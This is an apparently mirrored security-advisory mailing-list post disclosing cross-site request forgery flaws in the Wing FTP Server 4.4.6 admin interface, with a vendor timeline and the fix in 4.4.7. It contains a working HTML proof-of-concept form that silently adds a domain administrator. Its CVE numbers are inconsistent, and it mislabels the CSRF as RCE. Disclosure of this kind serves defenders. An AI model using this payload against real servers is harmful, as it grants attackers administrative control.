[CVE-2015-4108] Wing FTP Server Cross-site Request Forgery- vulnerabilities

From: alex_haynes@outlook.com
To: bugtraq@securityfocus.com
Subject: [CVE-2015-4108] Wing FTP Server Cross-site Request Forgery- vulnerabilities

Exploit Title: Wing FTP Server Cross-site Request Forgery vulnerabilities
Product: Wing FTP Server
Vulnerable Versions: 4.4.6 and all previous versions
Tested Version: 4.4.6
Advisory Publication: 05/06/2015
Latest Update: 05/06/2015
Vulnerability Type: Cross-site Request Forgery [CWE-352]
CVE Reference: CVE-2015-4018
Credit: Alex Haynes

Advisory Details:

(1) Vendor & Product Description
Vendor:Wing FTP software

Product & Version:
Wing FTP Server v 4.4.6

Vendor URL & Download:

Product Description:
"Wing FTP Server is an easy-to-use, secure and feature-rich enterprise FTP Server that can be used in Windows, Linux, Mac OSX and Solaris. It supports a number of file transfer protocols, including FTP, HTTP, FTPS, HTTPS and SFTP server, giving your end-users flexibility in how they connect to the server. And it provides admins with a web based interface to administrate the server from anywhere. You can also monitor server performance and online sessions and even receive email notifications about various events taking place on the server."

(2) Vulnerability Details:
The admin interface of Wing FTP Server is vulnerable to a Cross-site Request Forgery (CSRF) vulnerabilities. All functionalities including (but not limited to), addition and deletion of domain administrators, regular users, starting and stopping servers or creating and deleting FTP domains are vulnerable to Cross-site request Forgeries.

Proof of concept for RCE [CVE-2015-4018]:
POC adds a domain administrator to the FTP server.

    <form action="http://<server address>:5466/admin_addadmin.html" method="POST">
      <input type="hidden" name="admin" value="&#123;&quot;username&quot;&#58;&quot;admin2&quot;&#44;&quot;password&quot;&#58;&quot;admin2&quot;&#44;&quot;oldpassword&quot;&#58;&quot;&quot;&#44;&quot;readonly&quot;&#58;0&#44;&quot;domainadmin&quot;&#58;1&#44;&quot;domainlist&quot;&#58;&quot;test&quot;&#44;&quot;mydirectory&quot;&#58;&quot;&quot;&#44;&quot;ipmasks&quot;&#58;&#91;&#93;&#125;" />
      <input type="submit" value="Submit request" />

(3) Advisory Timeline:
27/05/2015 - First Contact
27/05/2015 - Vendor responds with requests for details of vulnerabilities.
28/05/2015 - Vulnerability details sent with POC.
28/05/2015 - Vendor requests clarification on impact and various attack scenarios.
28/05/2015 - Vulnerability scenarios defined.
29/05/2015 - Vulnerability confirmed and new version 4.4.7 released. Requests a week delay before public disclosure.
05/06/2015 - Public disclosure

Fixed in 4.4.7. 

(5) Credits:
Discovered by Alex Haynes


Copyright © 1995-2019 LinuxRocket.net. All rights reserved.